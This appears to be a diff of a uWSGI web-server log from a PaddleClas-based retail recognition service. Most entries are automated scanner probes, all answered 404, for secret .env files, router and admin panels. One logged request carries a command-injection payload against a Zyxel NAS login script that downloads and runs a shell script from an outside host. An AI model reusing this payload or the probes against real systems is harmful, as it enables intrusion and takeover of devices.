0|req: 537/639] 136.144.41.117 () {40 vars in 568 bytes} [Sat Feb 5 14:30:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 538/640] 23.90.160.114 () {34 vars in 487 bytes} [Sat Feb 5 14:44:05 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 539/641] 1.13.3.249 () {32 vars in 470 bytes} [Sat Feb 5 14:49:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 540/642] 1.13.3.249 () {32 vars in 419 bytes} [Sat Feb 5 14:49:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 541/643] 1.13.3.249 () {36 vars in 671 bytes} [Sat Feb 5 14:49:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 542/644] 1.13.189.96 () {34 vars in 367 bytes} [Sat Feb 5 15:00:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 543/645] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 5 16:45:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 55290] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 544/646] 62.171.150.168 () {28 vars in 311 bytes} [Sat Feb 5 17:24:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 545/647] 62.171.150.168 () {40 vars in 690 bytes} [Sat Feb 5 17:24:51 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 546/648] 71.6.135.131 () {30 vars in 488 bytes} [Sat 
Feb 5 17:34:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 25/649] 71.6.135.131 () {32 vars in 471 bytes} [Sat Feb 5 17:34:54 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 547/650] 35.233.62.116 () {38 vars in 520 bytes} [Sat Feb 5 17:35:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 548/651] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 5 18:30:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 549/652] 94.102.56.151 () {34 vars in 402 bytes} [Sat Feb 5 19:00:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 550/653] 209.17.96.10 () {30 vars in 409 bytes} [Sat Feb 5 19:29:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 551/654] 183.136.225.42 () {30 vars in 414 bytes} [Sat Feb 5 20:46:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 552/655] 183.136.225.42 () {32 vars in 475 bytes} [Sat Feb 5 20:47:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 553/656] 161.97.106.237 () {40 vars in 629 bytes} [Sat Feb 5 21:53:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 554/657] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 5 22:22:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 555/658] 132.145.39.16 () {34 vars 
in 432 bytes} [Sat Feb 5 22:38:12 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 556/659] 132.145.39.16 () {34 vars in 446 bytes} [Sat Feb 5 22:38:12 2022] GET /vendor/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 557/660] 132.145.39.16 () {34 vars in 448 bytes} [Sat Feb 5 22:38:13 2022] GET /storage/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 558/661] 132.145.39.16 () {34 vars in 446 bytes} [Sat Feb 5 22:38:13 2022] GET /public/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 559/662] 132.145.39.16 () {34 vars in 444 bytes} [Sat Feb 5 22:38:14 2022] GET /login/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 560/663] 132.145.39.16 () {34 vars in 440 bytes} [Sat Feb 5 22:38:14 2022] GET /app/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 561/664] 132.145.39.16 () {34 vars in 446 bytes} [Sat Feb 5 22:38:15 2022] GET /config/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 562/665] 132.145.39.16 () {34 vars in 424 bytes} [Sat Feb 5 22:38:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 563/666] 192.241.208.108 () {34 vars in 419 bytes} [Sat Feb 5 23:30:00 2022] GET /ReportServer => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 564/667] 83.97.20.34 () {26 vars in 286 bytes} [Sun Feb 6 00:29:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 565/668] 184.105.139.70 () {28 vars in 308 bytes} [Sun Feb 6 01:11:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 566/669] 222.186.59.201 () {30 vars in 477 bytes} [Sun Feb 6 01:24:40 2022] GET http://httpbin.org/ip => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 2/670] 222.186.59.201 () {30 vars in 468 bytes} [Sun Feb 6 01:24:40 2022] GET http://httpbin.org/ip => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 567/671] 136.144.41.117 () {40 vars in 568 bytes} [Sun Feb 6 01:41:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 568/672] 186.33.82.143 () {32 vars in 464 bytes} [Sun Feb 6 01:55:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 569/673] 47.101.199.29 () {34 vars in 459 bytes} [Sun Feb 6 02:30:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 570/674] 161.97.106.237 () {40 vars in 629 bytes} [Sun Feb 6 03:03:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 571/675] 35.87.25.248 () {36 vars in 522 bytes} [Sun Feb 6 03:15:53 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 572/676] 35.87.25.248 () {40 vars in 629 bytes} [Sun Feb 6 03:15:54 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 573/677] 23.251.102.74 () {34 vars in 487 bytes} [Sun Feb 6 04:18:53 2022] GET / => 
generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 574/678] 136.144.41.117 () {40 vars in 568 bytes} [Sun Feb 6 04:30:04 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 575/679] 83.97.20.34 () {30 vars in 328 bytes} [Sun Feb 6 04:32:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 576/680] 62.197.136.164 () {24 vars in 266 bytes} [Sun Feb 6 05:34:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 577/681] 62.197.136.164 () {32 vars in 742 bytes} [Sun Feb 6 05:34:47 2022] GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bcd%20/tmp;wget%20http://136.144.41.151/multi/wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20Exploit.ZyxeNas;+%23&password=asdf => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 578/682] 83.97.20.34 () {26 vars in 285 bytes} [Sun Feb 6 06:45:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 579/683] 103.207.42.166 () {36 vars in 590 bytes} [Sun Feb 6 08:55:56 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 580/684] 103.207.42.166 () {40 vars in 697 bytes} [Sun Feb 6 08:56:03 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 581/685] 103.90.205.76 () {32 vars in 470 bytes} [Sun Feb 6 09:19:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 582/686] 154.73.197.162 () {32 vars in 465 bytes} [Sun Feb 6 09:35:58 2022] GET / => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 583/687] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 6 10:09:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 584/688] 192.241.200.131 () {34 vars in 395 bytes} [Sun Feb 6 11:27:57 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 585/689] 103.207.42.166 () {36 vars in 590 bytes} [Sun Feb 6 12:04:51 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 586/690] 103.207.42.166 () {40 vars in 697 bytes} [Sun Feb 6 12:04:59 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 587/691] 83.97.20.34 () {26 vars in 286 bytes} [Sun Feb 6 12:35:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 588/692] 128.1.248.42 () {34 vars in 486 bytes} [Sun Feb 6 13:25:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 589/693] 35.195.93.98 () {42 vars in 562 bytes} [Sun Feb 6 13:34:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 590/694] 109.237.103.9 () {36 vars in 523 bytes} [Sun Feb 6 13:55:10 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 591/695] 2.57.121.44 () {34 vars in 400 bytes} [Sun Feb 6 14:19:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 592/696] 39.98.234.140 () {30 vars in 369 bytes} [Sun Feb 6 14:35:03 2022] HEAD 
/phpMyAdmin4.8.5/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 593/697] 45.95.169.102 () {40 vars in 567 bytes} [Sun Feb 6 14:53:59 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 594/698] 2.57.121.44 () {34 vars in 400 bytes} [Sun Feb 6 16:44:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 595/699] 89.165.69.195 () {36 vars in 521 bytes} [Sun Feb 6 16:49:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 596/700] 35.87.25.248 () {36 vars in 522 bytes} [Sun Feb 6 16:55:04 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 63/701] 35.87.25.248 () {40 vars in 629 bytes} [Sun Feb 6 16:55:05 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 597/702] 109.237.103.123 () {36 vars in 525 bytes} [Sun Feb 6 17:17:38 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 598/703] 109.237.103.118 () {36 vars in 525 bytes} [Sun Feb 6 17:50:11 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 599/704] 162.142.125.221 () {28 vars in 312 bytes} [Sun Feb 6 18:13:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 600/705] 162.142.125.221 () {34 vars in 444 bytes} [Sun Feb 6 18:13:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 601/706] 162.221.192.26 () {34 vars 
in 488 bytes} [Sun Feb 6 19:00:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 602/707] 164.90.197.46 () {32 vars in 439 bytes} [Sun Feb 6 19:11:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 603/708] 2.136.26.43 () {30 vars in 434 bytes} [Sun Feb 6 19:37:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 604/709] 181.143.64.122 () {32 vars in 464 bytes} [Sun Feb 6 19:53:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 605/710] 159.203.82.92 () {22 vars in 232 bytes} [Sun Feb 6 20:14:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 606/711] 192.241.206.152 () {34 vars in 429 bytes} [Sun Feb 6 21:20:19 2022] GET /manager/text/list => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 45.87.212.180 client_port: 39480] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 607/712] 47.103.4.170 () {34 vars in 458 bytes} [Sun Feb 6 21:41:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 608/713] 209.17.97.122 () {30 vars in 410 bytes} [Sun Feb 6 22:11:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 609/714] 40.71.60.51 () {36 vars in 521 bytes} [Sun Feb 6 22:50:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 610/715] 40.71.60.51 () {40 vars in 628 bytes} [Sun Feb 6 22:50:22 2022] 
POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 611/716] 40.71.60.51 () {36 vars in 521 bytes} [Sun Feb 6 23:15:27 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 612/717] 40.71.60.51 () {40 vars in 628 bytes} [Sun Feb 6 23:15:28 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 613/718] 192.241.212.182 () {34 vars in 419 bytes} [Mon Feb 7 00:09:33 2022] GET /manager/html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 614/719] 222.186.59.201 () {30 vars in 524 bytes} [Mon Feb 7 00:15:25 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 615/720] 222.186.59.201 () {30 vars in 502 bytes} [Mon Feb 7 00:15:25 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 616/721] 23.251.102.74 () {34 vars in 487 bytes} [Mon Feb 7 00:26:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 617/722] 47.101.52.66 () {34 vars in 425 bytes} [Mon Feb 7 00:39:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 618/723] 109.237.103.38 () {36 vars in 524 bytes} [Mon Feb 7 00:50:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 619/724] 47.101.40.67 () {34 vars in 425 bytes} [Mon Feb 7 01:36:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 620/725] 198.16.62.18 () {28 vars in 383 bytes} [Mon Feb 7 01:39:53 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 621/726] 162.142.125.221 () {30 vars in 402 bytes} [Mon Feb 7 02:47:29 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 622/727] 162.142.125.221 () {22 vars in 235 bytes} [Mon Feb 7 02:47:29 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 64/728] 162.142.125.220 () {34 vars in 444 bytes} [Mon Feb 7 02:50:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 623/729] 136.144.41.117 () {40 vars in 568 bytes} [Mon Feb 7 03:30:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 624/730] 52.53.215.162 () {34 vars in 499 bytes} [Mon Feb 7 04:04:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 625/731] 148.72.172.24 () {34 vars in 436 bytes} [Mon Feb 7 05:24:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 626/732] 192.241.209.104 () {34 vars in 423 bytes} [Mon Feb 7 05:25:45 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 627/733] 192.241.208.88 () {34 vars in 424 bytes} [Mon Feb 7 06:05:27 2022] GET /actuator/health => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 628/734] 36.5.197.231 () {32 vars in 476 bytes} [Mon Feb 7 06:32:18 2022] GET 
http://wujieliulan.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 629/735] 36.5.197.231 () {32 vars in 476 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.minghui.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 2/736] 36.5.197.231 () {32 vars in 484 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.epochtimes.com/ => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 3/737] 36.5.197.231 () {32 vars in 469 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.boxun.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 630/738] 36.5.197.231 () {32 vars in 465 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.bing.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 631/739] 36.5.197.231 () {32 vars in 473 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.123cha.com/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 632/740] 36.5.197.231 () {32 vars in 470 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.baidu.com/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 4/741] 36.5.197.231 () {22 vars in 273 bytes} [Mon Feb 7 06:32:19 2022] CONNECT www.voanews.com:443 => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 2/742] 36.5.197.231 () {32 vars in 463 bytes} [Mon Feb 7 06:32:25 2022] GET http://www.rfa.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 633/743] 136.144.41.117 () {40 vars in 568 bytes} [Mon Feb 7 07:08:42 2022] GET / => generated 
179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 634/744] 101.251.238.53 () {32 vars in 618 bytes} [Mon Feb 7 07:25:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 635/745] 128.14.134.134 () {34 vars in 488 bytes} [Mon Feb 7 07:40:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 636/746] 47.103.22.60 () {34 vars in 430 bytes} [Mon Feb 7 08:35:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 637/747] 112.231.159.160 () {34 vars in 432 bytes} [Mon Feb 7 08:52:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-07 09:17:04 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-07 09:17:04 INFO: DetPostProcess : +2022-02-07 09:17:04 INFO: DetPreProcess : +2022-02-07 09:17:04 INFO: transform_ops : +2022-02-07 09:17:04 INFO: DetResize : +2022-02-07 09:17:04 INFO: interp : 2 +2022-02-07 09:17:04 INFO: keep_ratio : False +2022-02-07 09:17:04 INFO: target_size : [640, 640] +2022-02-07 09:17:04 INFO: DetNormalizeImage : +2022-02-07 09:17:04 INFO: is_scale : True +2022-02-07 09:17:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:04 INFO: DetPermute : +2022-02-07 09:17:04 INFO: Global : +2022-02-07 09:17:04 INFO: batch_size : 1 +2022-02-07 09:17:04 INFO: cpu_num_threads : 1 +2022-02-07 09:17:04 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-07 09:17:04 INFO: enable_benchmark : True +2022-02-07 09:17:04 INFO: enable_mkldnn : True +2022-02-07 09:17:04 INFO: enable_profile : False +2022-02-07 09:17:04 INFO: gpu_mem : 8000 +2022-02-07 09:17:04 INFO: image_shape : [3, 640, 640] +2022-02-07 09:17:04 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-07 09:17:04 INFO: ir_optim : True +2022-02-07 09:17:04 INFO: labe_list : ['foreground'] +2022-02-07 09:17:04 INFO: max_det_results : 5 +2022-02-07 09:17:04 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-07 09:17:04 INFO: rec_nms_thresold : 0.05 +2022-02-07 09:17:04 INFO: threshold : 0.2 +2022-02-07 09:17:04 INFO: use_fp16 : False +2022-02-07 09:17:04 INFO: use_gpu : False +2022-02-07 09:17:04 INFO: use_tensorrt : False +2022-02-07 09:17:04 INFO: IndexProcess : +2022-02-07 09:17:04 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-07 09:17:04 INFO: return_k : 5 +2022-02-07 
09:17:04 INFO: score_thres : 0.5 +2022-02-07 09:17:04 INFO: RecPostProcess : None +2022-02-07 09:17:04 INFO: RecPreProcess : +2022-02-07 09:17:04 INFO: transform_ops : +2022-02-07 09:17:04 INFO: ResizeImage : +2022-02-07 09:17:04 INFO: size : 224 +2022-02-07 09:17:04 INFO: NormalizeImage : +2022-02-07 09:17:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:04 INFO: order : +2022-02-07 09:17:04 INFO: scale : 0.00392157 +2022-02-07 09:17:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:04 INFO: ToCHWImage : None +Inference: 378.16524505615234 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 8/14] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:01:37 2021] POST /reference_client/ => generated 98 bytes in 5710 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +[pid: 19148|app: 0|req: 638/748] 58.213.200.39 () {34 vars in 446 bytes} [Mon Feb 7 09:17:03 2022] POST /reference_client/ => generated 98 bytes in 2791 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) req -2021-11-03 04:02:32 INFO: +2022-02-07 09:17:55 INFO: =========================================================== == 